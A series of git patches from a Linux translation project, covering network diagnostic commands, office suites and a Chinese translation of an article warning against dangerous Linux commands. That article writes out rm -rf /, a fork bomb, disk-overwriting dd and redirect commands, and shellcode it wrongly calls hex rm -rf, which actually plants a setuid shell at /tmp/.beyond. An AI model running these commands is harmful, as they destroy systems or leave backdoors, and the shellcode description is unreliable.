+图形环境实际上只是更多的系统程序和文件。图形环境提供了常用的菜单窗口、鼠标指针、对话框、状态和指示器等。
+需要注意的是,您不需要使用最初安装的图形环境。如果你愿意,你可以把它另外的形式。每个图形环境都有不同的特性。有些看起来更像 Apple OS X,有些看起来更像 Windows,有些则是独一无二的,不要试图模仿其他的图形界面。
+### 包管理器
+
+包管理器在不同的系统中很难被我们把握,但是现在有一个人们非常熟悉的类似的系统——应用程序商店。软件包系统实际上是为 Linux 存储应用程序。您可以使用包管理器来选择您想要的应用程序,而不是从该web站点安装这个应用程序,以及从另一个站点来安装其他应用程序。然后,包管理器从预先构建的开放源码应用程序的中心知识库安装应用程序。
+### 应用程序
+
+Linux附带了许多预安装的应用程序。您可以从包管理器获得更多。许多应用程序相当棒,其他人需要工作(?)。有时,同一个应用程序在 Windows 或 Mac OS 或 Linux 上运行的版本会不同。
+例如,您可以使用 Firefox 浏览器和 Thunderbird (用于电子邮件)。您可以使用 LibreOffice 作为 Microsoft Office 的替代品,并通过 Valve's Steam 程序运行游戏。您甚至可以在 Linux 上使用 WINE 来运行一些本地 Windows 应用程序。
+### 安装 Linux
+
+第一步通常是安装Linux发行版。你可能听说过 Red Hat、Ubuntu、Fedora、Arch Linux 和 SUSE,等等。这些是 Linux 的不同发行版。
+如果没有 Linux 发行版,则必须分别安装每个组件。许多组件是由不同人群开发和提供的,因此单独安装每个组件将是一项冗长而乏味的任务。幸运的是,构建 ```distros``` 的人会为您做这项工作。他们抓取所有的组件,构建它们,确保它们一起工作,然后将它们打包在一个单独的安装进程中。
+各种发行版可能会做出不同的选择,使用不同的组件,但它仍然是 Linux。应用程序被开发在一个发行版中却经常在其他发行版上运行的很好。
+如果你是一个Linux初学者,想尝试Linux,我推荐[Ubuntu 安装][1]。还有其他的发行版也可以尝试: Linux Mint、Fedora、Debian、Zorin OS、Elementary OS等等。在以后的文章中,我们将介绍 Linux 系统的其他方面,并提供关于如何开始使用 Linux 的更多信息。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
+
+作者:[John Bonesio][a]
+译者:[stevenzdg988](https://github.com/stevenzdg988)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/johnbonesio
+[1]:https://www.ubuntu.com/download/desktop
+[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 0a7cf345dac61ecad8b92bfc98e8ea74c59644b7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:32:31 +0800
Subject: [PATCH 028/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20More=20ways=20to?=
=?UTF-8?q?=20examine=20network=20connections=20on=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...to examine network connections on Linux.md | 209 ++++++++++++++++++
1 file changed, 209 insertions(+)
create mode 100644 sources/tech/20171019 More ways to examine network connections on Linux.md
diff --git a/sources/tech/20171019 More ways to examine network connections on Linux.md b/sources/tech/20171019 More ways to examine network connections on Linux.md
new file mode 100644
index 0000000000..1583882158
--- /dev/null
+++ b/sources/tech/20171019 More ways to examine network connections on Linux.md
@@ -0,0 +1,209 @@
+More ways to examine network connections on Linux
+======
+The ifconfig and netstat commands are incredibly useful, but there are many other commands that can help you see what's up with you network on Linux systems. Today's post explores some very handy commands for examining network connections.
+
+### ip command
+
+The **ip** command shows a lot of the same kind of information that you'll get when you use **ifconfig**. Some of the information is in a different format - e.g., "192.168.0.6/24" instead of "inet addr:192.168.0.6 Bcast:192.168.0.255" and ifconfig is better for packet counts, but the ip command has many useful options.
+
+First, here's the **ip a** command listing information on all network interfaces.
+```
+$ ip a
+1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
+ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+ inet 127.0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+ inet6 ::1/128 scope host
+ valid_lft forever preferred_lft forever
+2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
+ link/ether 00:1e:4f:c8:43:fc brd ff:ff:ff:ff:ff:ff
+ inet 192.168.0.6/24 brd 192.168.0.255 scope global eth0
+ valid_lft forever preferred_lft forever
+ inet6 fe80::21e:4fff:fec8:43fc/64 scope link
+ valid_lft forever preferred_lft forever
+
+```
+
+If you want only to see a simple list of network interfaces, you can limit its output with **grep**.
+```
+$ ip a | grep inet
+ inet 127.0.0.1/8 scope host lo
+ inet6 ::1/128 scope host
+ inet 192.168.0.6/24 brd 192.168.0.255 scope global eth0
+ inet6 fe80::21e:4fff:fec8:43fc/64 scope link
+
+```
+
+You can get a glimpse of your default route using a command like this:
+```
+$ ip route show
+default via 192.168.0.1 dev eth0
+192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.6
+
+```
+
+In this output, you can see that the default gateway is 192.168.0.1 through eth0 and that the local network is the fairly standard 192.168.0.0/24.
+
+You can also use the **ip** command to bring network interfaces up and shut them down.
+```
+$ sudo ip link set eth1 up
+$ sudo ip link set eth1 down
+
+```
+
+### ethtool command
+
+Another very useful tool for examining networks is **ethtool**. This command provides a lot of descriptive data on network interfaces.
+```
+$ ethtool eth0
+Settings for eth0:
+ Supported ports: [ TP ]
+ Supported link modes: 10baseT/Half 10baseT/Full
+ 100baseT/Half 100baseT/Full
+ 1000baseT/Full
+ Supported pause frame use: No
+ Supports auto-negotiation: Yes
+ Advertised link modes: 10baseT/Half 10baseT/Full
+ 100baseT/Half 100baseT/Full
+ 1000baseT/Full
+ Advertised pause frame use: No
+ Advertised auto-negotiation: Yes
+ Speed: 100Mb/s
+ Duplex: Full
+ Port: Twisted Pair
+ PHYAD: 1
+ Transceiver: internal
+ Auto-negotiation: on
+ MDI-X: on (auto)
+Cannot get wake-on-lan settings: Operation not permitted
+ Current message level: 0x00000007 (7)
+ drv probe link
+ Link detected: yes
+
+```
+
+You can also use the **ethtool** command to examine ethernet driver settings.
+```
+$ ethtool -i eth0
+driver: e1000e
+version: 3.2.6-k
+firmware-version: 1.4-0
+expansion-rom-version:
+bus-info: 0000:00:19.0
+supports-statistics: yes
+supports-test: yes
+supports-eeprom-access: yes
+supports-register-dump: yes
+supports-priv-flags: no
+
+```
+
+The autonegotiation details can be displayed with a command like this:
+```
+$ ethtool -a eth0
+Pause parameters for eth0:
+Autonegotiate: on
+RX: on
+TX: on
+
+```
+
+### traceroute command
+
+The **traceroute** command displays routing pathways. It works by using the TTL (time to live) field in the packet header in a series of packets to capture the path that packets take and how long they take to get from one hop to the next. Traceroute's output helps to gauge the health of network connections, since some routes might take much longer to reach the eventual destination.
+```
+$ sudo traceroute world.std.com
+traceroute to world.std.com (192.74.137.5), 30 hops max, 60 byte packets
+ 1 192.168.0.1 (192.168.0.1) 3.691 ms 3.678 ms 3.665 ms
+ 2 10.224.64.1 (10.224.64.1) 26.273 ms 27.354 ms 28.574 ms
+ 3 10.20.0.33 (10.20.0.33) 28.293 ms 30.625 ms 33.959 ms
+ 4 10.20.0.226 (10.20.0.226) 36.807 ms 37.868 ms 37.857 ms
+ 5 204.111.0.132 (204.111.0.132) 38.256 ms 39.091 ms 40.429 ms
+ 6 ash-b1-link.telia.net (80.239.161.69) 41.612 ms 28.214 ms 29.573 ms
+ 7 xe-1-3-1.er1.iad10.us.zip.zayo.com (64.125.13.157) 30.429 ms 27.915 ms 29.065 ms
+ 8 ae6.cr1.dca2.us.zip.zayo.com (64.125.20.117) 31.353 ms 32.413 ms 33.821 ms
+ 9 ae27.cs1.dca2.us.eth.zayo.com (64.125.30.246) 43.474 ms 44.519 ms 46.037 ms
+10 ae4.cs1.lga5.us.eth.zayo.com (64.125.29.202) 48.107 ms 48.960 ms 50.024 ms
+11 ae8.mpr3.bos2.us.zip.zayo.com (64.125.30.139) 51.626 ms 51.200 ms 39.283 ms
+12 64.124.51.229.t495-rtr.towerstream.com (64.124.51.229) 40.233 ms 41.295 ms 39.651 ms
+13 69.38.149.18 (69.38.149.18) 44.955 ms 46.210 ms 55.673 ms
+14 64.119.137.154 (64.119.137.154) 56.076 ms 56.064 ms 56.052 ms
+15 world.std.com (192.74.137.5) 63.440 ms 63.886 ms 63.870 ms
+
+```
+
+### tcptraceroute command
+
+The **tcptraceroute** command does basically the same thing as traceroute except that it is able to bypass the most common firewall filters. As the command's man page explains, tcptraceroute sends out TCP SYN packets instead of UDP or ICMP ECHO packets, thus making it less susceptible to being blocked.
+
+### tcpdump command
+
+The **tcpdump** command allows you to capture network packets for later analysis. With the -D option, it lists available interfaces.
+```
+$ tcpdump -D
+1.eth0 [Up, Running]
+2.any (Pseudo-device that captures on all interfaces) [Up, Running]
+3.lo [Up, Running, Loopback]
+4.nflog (Linux netfilter log (NFLOG) interface)
+5.nfqueue (Linux netfilter queue (NFQUEUE) interface)
+6.usbmon1 (USB bus number 1)
+7.usbmon2 (USB bus number 2)
+8.usbmon3 (USB bus number 3)
+9.usbmon4 (USB bus number 4)
+10.usbmon5 (USB bus number 5)
+11.usbmon6 (USB bus number 6)
+12.usbmon7 (USB bus number 7)
+
+```
+
+The -v (verbose) option controls how much detail you will see -- more v's, more details, but more than three v's doesn't add anything more.
+```
+$ sudo tcpdump -vv host 192.168.0.32
+tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
+20:26:31.321816 IP (tos 0x10, ttl 64, id 22411, offset 0, flags [DF], proto TCP (6), length 184)
+ 192.168.0.6.ssh > 192.168.0.32.57294: Flags [P.], cksum 0x8221 (incorrect -> 0x0254), seq 3891093411:3891093555, ack 2388988308, win 329, length 144
+20:26:31.321984 IP (tos 0x10, ttl 64, id 22412, offset 0, flags [DF], proto TCP (6), length 200)
+ 192.168.0.6.ssh > 192.168.0.32.57294: Flags [P.], cksum 0x8231 (incorrect -> 0x3db0), seq 144:304, ack 1, win 329, length 160
+20:26:31.323791 IP (tos 0x0, ttl 128, id 20259, offset 0, flags [DF], proto TCP (6), length 40)
+ 192.168.0.32.57294 > 192.168.0.6.ssh: Flags [.], cksum 0x643d (correct), seq 1, ack 304, win 385, length 0
+20:26:31.383954 IP (tos 0x10, ttl 64, id 22413, offset 0, flags [DF], proto TCP (6), length 248)
+...
+
+```
+
+Expect to see a _lot_ of output when you run commands like this one.
+
+This command captures 11 packets from a specific host and over eth0. The -w option identifies the file that will contain the capture packets. In this example command, we've only asked to capture 11 packets.
+```
+$ sudo tcpdump -c 11 -i eth0 src 192.168.0.32 -w packets.pcap
+tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
+11 packets captured
+11 packets received by filter
+0 packets dropped by kernel
+
+```
+
+### arp command
+
+The arp command maps IPv4 addresses to hardware addresses. The information provided can also be used to identify the systems to some extent, since the network adaptors in use can tell you something about the systems using them. The second MAC address below, starting with f8:8e:85, is easily identified as a Comtrend router.
+```
+$ arp -a
+? (192.168.0.12) at b0:c0:90:3f:10:15 [ether] on eth0
+? (192.168.0.1) at f8:8e:85:35:7f:b9 [ether] on eth0
+
+```
+
+The first line above shows the MAC address for the network adaptor on the system itself. This network adaptor appears to have been manufactured by Chicony Electronics in Taiwan. You can look up MAC address associations fairly easily on the web with tools such as this one from Wireshark -- https://www.wireshark.org/tools/oui-lookup.html
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3233306/linux/more-ways-to-examine-network-connections-on-linux.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
From f888157f796b08bad0198d66a80f0a5e95a985c6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:34:22 +0800
Subject: [PATCH 029/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=206=20Best=20Open?=
=?UTF-8?q?=20Source=20Alternatives=20to=20Microsoft=20Office=20for=20Linu?=
=?UTF-8?q?x?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ernatives to Microsoft Office for Linux.md | 112 ++++++++++++++++++
1 file changed, 112 insertions(+)
create mode 100644 sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md
diff --git a/sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md b/sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md
new file mode 100644
index 0000000000..400a800899
--- /dev/null
+++ b/sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md
@@ -0,0 +1,112 @@
+6 Best Open Source Alternatives to Microsoft Office for Linux
+======
+**Brief: Looking for Microsoft Office in Linux? Here are the best free and open source alternatives to Microsoft Office for Linux.**
+
+Office Suites are a mandatory part of any operating system. It is difficult to imagine using a desktop OS without office software. While Windows has MS Office Suite and Mac OS X has its own iWork apart from lots of other Office Suites especially meant for these OS, Linux too has some arrows in its quiver.
+
+In this article, I list the best Microsoft Office alternatives for Linux.
+
+## Best open source alternatives to Microsoft Office for Linux
+
+![Best Microsoft office alternatives for Linux][1]
+
+Before we see the MS Office alternatives, let's first see what you look for in a decent office suite:
+
+ * Word processor
+ * Spreadsheet
+ * Presentation
+
+
+
+I know that Microsoft Office offers a lot more than these three tools but in reality, you would be using these three tools most of the time. It's not that open source office suites are restricted to have only these three products. Some of them offer additional tools as well but our focus would be on the above-mentioned tools.
+
+Let's see what office suits for Linux have we got here:
+
+### 6. Apache OpenOffice
+
+![OpenOffice Logo][2]
+
+[Apache OpenOffice][3] or simply OpenOffice has a history of name/owner change. It was born as Star Office in 1999 by Sun Microsystems which later renamed it as OpenOffice to pit it against MS Office as a free and open source alternative. When Oracle bought Sun in 2010, it discontinued the development of OpenOffice after a year. And finally it was Apache who supported it and it is now known as Apache OpenOffice.
+
+Apache OpenOffice is available for a number of platforms that includes Linux, Windows, Mac OS X, Unix, BSD. It also includes support for MS Office files apart from its own OpenDocument format. The office suite contains the following applications: Writer, Calc, Impress, Base, Draw, Math.
+
+[Installing OpenOffice][4] is a pain as it doesn't provide a decent installer. Also, there are rumors that [OpenOffice development might have been stalled][5]. These two are the main reasons why I wouldn't recommend it. I listed it here more for historical purposes.
+
+### 5. Feng Office
+
+![Feng Office logo][6]
+
+[Feng Office][7] was previously known as OpenGoo. It is not your regular office suite. It is entirely focused on being an online office suite like Google Docs. In other words, it's an open source [collaboration platform][8].
+
+There is no desktop version available so if you are looking to using it on a single Linux desktop, you are out of luck here. On the other hand, if you have a small business, an institution or some other organization, you may try to deploy it on the local server.
+
+### 4. Siag Office
+
+![SIAG Office logo][9]
+
+[Siag][10] is an extremely lightweight office suite for Unix-Like systems that can be run on a 16 MB system. Since it is very light-weight, it lacks many of the features that are found in a standard office suite. But small is beautiful, ain't it? It has all the necessary function of an office suite that could "just work" on [lightweight Linux distributions][11]. It comes by default in [Damn Small Linux][12].
+
+### 3. Calligra Suite
+
+![Calligra free and Open Source office logo][13]
+
+[Calligra][14], previously known as KOffice, is the default Office suite in KDE. It is available for Linux and FreeBSD system with support for Mac OS X and Windows. It was also [launched for Android][15]. but unfortunately, it's not available for Android anymore. It has all the application needed for an office suite along with some extra applications such as Flow for flow charts and Plane for project management.
+
+Calligra has generated quite a noise after their recent developments and it may be seen as an [alternative to LibreOffice][16].
+
+### 2. ONLYOFFICE
+
+![ONLYOFFICE is Linux alternative to Microsoft Office][17]
+
+Relatively a new player in the market, [ONLYOFFICE][18] is an office suite more focused on the [collaborative][8] part. Enterprises (and even individuals) can deploy it on their own server to have a Google Docs like collaborative office suite.
+
+Don't worry. You don't have to bother about installing it on a server. There is a free and [open source desktop version of ONLYOFFICE][19]. You can even get .deb and .rpm binaries to easily install it on your desktop Linux system.
+
+### 1. LibreOffice
+
+![LibreOffice logo][20]
+
+When Oracle decided to discontinue the development of OpenOffice, it was [The Document Foundation][21] who forked it and gave us what is known as [Libre-Office][22]. Since then a number of Linux distributions have replaced OpenOffice for LibreOffice as their default office application.
+
+It is available for Linux, Windows and Mac OS X which makes it easy to use in a cross-platform environment. Same as Apache OpenOffice, this too includes support for MS Office files apart from its own OpenDocument format. It also contains the same applications as Apache OpenOffice.
+
+You can also use LibreOffice as a collaborative platform using [Collabora Online][23]. Basically, LibreOffice is a complete package and undoubtedly the best **Microsoft Office alternative for Linux** , Windows and macOS.
+
+## What do you think?
+
+I hope these Open Source alternatives to Microsoft Office saves your money. Which open source productivity suite do you use?
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/abhishek/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-800x450.jpg
+[2]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/open-office-logo-wide.jpg
+[3]:http://www.openoffice.org/
+[4]:https://itsfoss.com/install-openoffice-ubuntu-linux/
+[5]:https://itsfoss.com/openoffice-shutdown/
+[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/feng-office-logo-wide-800x240.jpg
+[7]:http://www.fengoffice.com/web/index.php?lang=en
+[8]:https://en.wikipedia.org/wiki/Collaborative_software
+[9]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/siag-office-logo-wide-800x240.jpg
+[10]:http://siag.nu/
+[11]:https://itsfoss.com/lightweight-linux-beginners/
+[12]:http://www.damnsmalllinux.org/
+[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/calligra-office-logo-wide-800x240.jpg
+[14]:http://www.calligra.org/
+[15]:https://itsfoss.com/calligra-android-app-coffice/
+[16]:http://maketecheasier.com/is-calligra-a-great-alternative-to-libreoffice/2012/06/18
+[17]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/only-office-logo-wide-800x240.png
+[18]:https://www.onlyoffice.com/
+[19]:https://itsfoss.com/review-onlyoffice-desktop-editors-linux/
+[20]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/LibreOffice-logo-wide-800x240.jpg
+[21]:http://www.documentfoundation.org/
+[22]:http://www.libreoffice.org/
+[23]:https://www.collaboraoffice.com/collabora-online/
From d23b305ba2990e2dd7c64b8a091bd473b3e7942f Mon Sep 17 00:00:00 2001
From: wxy
Date: Fri, 5 Jan 2018 23:31:15 +0800
Subject: [PATCH 030/371] PRF:20171219 The Linux commands you should NEVER
use.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@CYLeft 翻译的不错,更细心些会更佳
---
...The Linux commands you should NEVER use.md | 144 +++++++++---------
1 file changed, 71 insertions(+), 73 deletions(-)
diff --git a/translated/tech/20171219 The Linux commands you should NEVER use.md b/translated/tech/20171219 The Linux commands you should NEVER use.md
index d47d815f02..0d4ea548a4 100644
--- a/translated/tech/20171219 The Linux commands you should NEVER use.md
+++ b/translated/tech/20171219 The Linux commands you should NEVER use.md
@@ -1,168 +1,166 @@
-一些您不应该使用的 Linux 命令
+绝不要用的 Linux 命令!
======
-当然,除非你想干掉你的机器。
-蜘蛛侠有这样的一句信条, "权力越大,责任越大。" 对于 Linux 系统管理员们来说,这也是一种适合采用的明智态度。
+![](https://www.hpe.com/content/dam/hpe/insights/articles/2017/12/the-linux-commands-you-should-never-use/featuredStory/The-Linux-commands-you-should-NEVER-use-1879.jpg.transform/nxt-1043x496-crop/image.jpeg)
-不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 [not patching Apache Struts][1] 。
+**当然,除非你想干掉你的机器。**
-如果不能停留在安全补丁之上,将会带来一个远超过系统管理员工资等级的战略性业务问题。这里就有一些足以攻击 Linux 服务器的方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。
+蜘蛛侠有这样的一句信条,“权力越大,责任越大。” 对于 Linux 系统管理员们来说,这也是一种应当采用的明智态度。
+
+不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 [没有打补丁的 Apache Struts][1] 。
+
+如果不能跑在安全补丁之前,这将会带来一个远超过系统管理员工资水平的战略性业务问题。这里就有一些足以搞死 Linux 服务器的简单方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。
下列是一些著名的命令,任何拥有 root 权限的用户都能借助它们对服务器造成严重破坏。
-警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。
+**警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。**
那么,继续!
### rm -rf /
-想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,他能删除一切,我说的是,能删除所有存在你系统里的内容!
+想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,它能删除一切,我说的是,能删除所有存在你系统里的内容!
-和大多数 [Linux commands][2]一样,‘rm’这个核心指令使用起来非常方便。即便是最顽固的文件他也能帮你删除。结合起后面两个参数理解‘rm’指令时,你很容易陷入沉思:‘-r’,强制递归删除所有子目录,‘-f’,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。
+和大多数 [Linux 命令][2]一样,`rm` 这个核心命令使用起来非常方便。即便是最顽固的文件它也能帮你删除。结合起后面两个参数理解 `rm` 指令时,你很容易陷入大麻烦:`-r`,强制递归删除所有子目录,`-f`,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。
如果你真这么干了,想想该怎么和老板解释吧!
-现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧 [this cautionary tale from a sysadmin on Reddit][3]:
+现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧, [这个警示故事来自于一个系统管理员在 Reddit 上的帖子][3]:
-> 我在IT界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了‘rm- f’
+> 我在 IT 界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了 `rm- f`
>
-> 长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个‘cp -R’去复制我需要的内容。
+> 长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个 `cp -R` 去复制我需要的内容。
>
-> 在我的聪明才智下,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。
+> 以我的聪明劲,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。
>
-> 不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我的脑子被‘rm -R ./videodir/* ../companyvideodirwith651vidsin/’这样一条命令自动驱使。
+> 不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我在敲入 `rm -R ./videodir/* ../companyvideodirwith651vidsin/` 这样一条命令时神游物外。
+
+然后,当文件化为乌有时其中也包括了公司的视频。幸运的是,在疯狂敲击 `control -C` 后,在删除太多文件之前,系统管理员中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。
-然后,当文件在一片空白后归档,公司的视频文件才出现。幸运的是,在疯狂敲击‘control -C’后,得以在删除大量文件之前,中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。
+事实上,绝大部分现代操作系统都会在你犯这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。(LCTT 译注:幸运的是,可能在根目录下删除整个文件系统的人太多了额,后来 `rm` 默认禁止删除根目录,除非——你手动加上 `--no-preserve-root` 参数!)
-事实上,绝大部分现代操作系统都会在你烦这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。
+这里有一些更为隐蔽的方式调用 `rm -rf`。思考一下下面的代码:
-这里有一些更为隐蔽的方式调用 rm -rf。思考一下下面的代码
+```
+char esp[] __attribute__ ((section(“.text”))) = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
+“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
+“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
+“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
+“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
+“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
+“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
+“cp -p /bin/sh /tmp/.beyond; chmod 4755
+/tmp/.beyond;”;
+```
-`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
-
-`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
-
-`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
-
-`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
-
-`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
-
-`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
-
-`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
-
-`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
-
-`/tmp/.beyond;";`
-
-这是什么?这是 16 进制的‘rm -rf’写法。在你不明确这段代码之前,请不要运行这条命令。
+这是什么?这是 16 进制的 `rm -rf` 写法。在你不明确这段代码之前,请千万不要运行这条命令!
### fork 炸弹
既然我们讨论的都是些奇怪的代码,不妨思考一下这一行:
+
```
:(){ :|: & };:
```
-对你来说,这可能看起来有些神秘,但是我看来,它很像那个臭名昭著的 [Bash fork bomb][4]。反复启动新的 Bash shell ,直到你的系统资源消耗殆尽直至系统崩溃。
+对你来说,这可能看起来有些神秘,但是我看来,它就是那个臭名昭著的 [Bash fork 炸弹][4]。它会反复启动新的 Bash shell,直到你的系统资源消耗殆尽、系统崩溃。
-不应该在最新的 Linux 系统上做这些操作。注意,我说的是不应该。我没有说不能。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变式 [Bash fork bomb variants][5]),你就需要反复敲击关机命令直到系统重启了。
+不应该在最新的 Linux 系统上做这些操作。注意,我说的是**不应该**。我没有说**不能**。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变体 [Bash fork 炸弹变体][5]),你仍然可以反复虐待服务器,直到系统重启了。
### 垃圾数据重写硬盘
-有时候你想彻底清除硬盘的数据,你应该使用 [Darik's Boot and Nuke (DBAN)][6] 工具去完成这项工作。
+有时候你想彻底清除硬盘的数据,你应该使用 [Darik's Boot and Nuke (DBAN)][6] 工具去完成这项工作。
+
+但是如果仅仅想让你的存储器乱套,那很简单:
-但是仅仅在你的存储器里制造最豪华的混乱,是很难彻底清除数据的:
```
-Any command > /dev/hda
+任意命令 > /dev/hda
```
-在我说“any command,”时,意味着可以输出任意命令,比如:
+我说的“任意命令”,是指有输出的任意命令,比如:
+
```
ls -la > /dev/hda
```
-…引导目录列表到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。相比于盲目恐慌,这才是这天工作的一个好的开始。或者,把它换成 [career-limiting crisis][7]。
+……将目录列表通过管道送到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。这是让你开始盲目恐慌的一天的好办法,或者,可以把它变成 [职业禁入方式][7]。
### 擦除硬盘!
-历来另一个受欢迎的擦除硬盘的方式是执行:
+另一个一直受欢迎的擦除硬盘的方式是执行:
+
```
dd if=/dev/zero of=/dev/hda
```
-你可以用这条命令写入数据到你的硬盘设备。‘dd’命令可以从特殊文件中获取无尽个‘0’字符,并且将它全部写入你的设备。
+你可以用这条命令写入数据到你的硬盘设备。`dd` 命令可以从特殊文件中获取无尽个 `0` 字符,并且将它全部写入你的设备。
-可能现在 /dev/zero 目录觉得这是个愚蠢的想法,但是它真的管用。比如说,你可以使用 [clear unused space in a partition with zeros][8]。它能使分区里的图片压缩到更小以便于数据传输或是存档使用。
+可能现在听起来 `/dev/zero` 是个愚蠢的想法,但是它真的管用。比如说,你可以使用它来 [用零清除未使用的分区空间][8]。它能使分区的镜像压缩到更小,以便于数据传输或是存档使用。
